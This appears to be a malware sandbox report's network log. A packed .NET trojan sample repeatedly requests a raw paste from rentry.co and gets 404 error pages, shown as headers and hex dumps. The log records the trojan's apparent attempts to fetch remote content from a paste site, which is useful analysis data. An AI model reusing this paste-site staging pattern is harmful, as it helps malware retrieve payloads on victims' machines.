                                                                                        2024-10-18 10:42:36 UTC715INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:36 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:42:36 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:42:36 UTC1007INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 33 31 39 39 65 32 34 36 33 65 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 31 4e 69 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ec3199e2463e',t:'MTcyOTI0ODE1Ni4wMDAwMDA=
                                                                                        2024-10-18 10:42:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.660646104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:39 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:40 UTC662INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:40 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2B46zUk%2BRQ9emY%2FgyYjlxcnOULbt5lr0ebB8GDRxvYAg3%2BzPme76tRaegxd4bFHlSNNzT3T6KQvcVHusC8qGt6sOgwG3SbZDc3ifKRU9Rn0k7r7KB89CfmrO%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ec474ccc462c-DFW
                                                                                        2024-10-18 10:42:40 UTC707INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:40 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <met
                                                                                        2024-10-18 10:42:40 UTC1369INData Raw: 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20
                                                                                        Data Ascii: .co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:42:40 UTC1015INData Raw: 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 34 37 34 63 63 63 34 36 32 63 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 32 4d 43 34 77
                                                                                        Data Ascii: /bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ec474ccc462c',t:'MTcyOTI0ODE2MC4w
                                                                                        2024-10-18 10:42:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.660650104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:42 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:42:43 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:43 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N3wVO46adkfbdN0Snzv2zfJtgyLpYNaNAXHQiopYP3JKzcr9OMCo9pEEQ0w43fL7b8yLQCvmcdBjlNBkToBk%2FO7D5tK5WMvvAI%2BcXSXAQMif7xFfh0Iu4o2ZPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ec5d6b3d6b2c-DFW
                                                                                        2024-10-18 10:42:43 UTC715INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:43 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:42:43 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:42:43 UTC1006INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 35 64 36 62 33 64 36 62 32 63 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 32 4d 79 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ec5d6b3d6b2c',t:'MTcyOTI0ODE2My4wMDAwMDA=
                                                                                        2024-10-18 10:42:43 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:42:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.660654104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:46 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:46 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:46 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=USfY9jybbEafHxnwUONRubtPkzq3YBEOvbEFAmdrJuGPftX0hpshWGsJIde12ZItrUGUe5Zqsv7pwgdtIhyARcEsA4M74y3NY6lWQ2KO3ADwYxvPe%2Fg%2FmtkWUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ec71ffac477a-DFW
                                                                                        2024-10-18 10:42:46 UTC715INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:46 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:42:46 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:42:46 UTC1007INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 63 37 31 66 66 61 63 34 37 37 61 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 32 4e 69 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ec71ffac477a',t:'MTcyOTI0ODE2Ni4wMDAwMDA=
                                                                                        2024-10-18 10:42:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.660656104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:49 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:42:49 UTC664INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:49 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t7PScLckuM0GcQ%2Fjy3f%2BVN%2BlTGi0aAmFruZZT%2FYl9TXq5eYUkK%2FHgWcpIfdMkaogsSmGg2YIeqH36em%2FzC6g7rBOu6DsPW93VmgLgkg7hb5%2BilbCYrjZWLtG1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ec82ba61ddb3-DFW
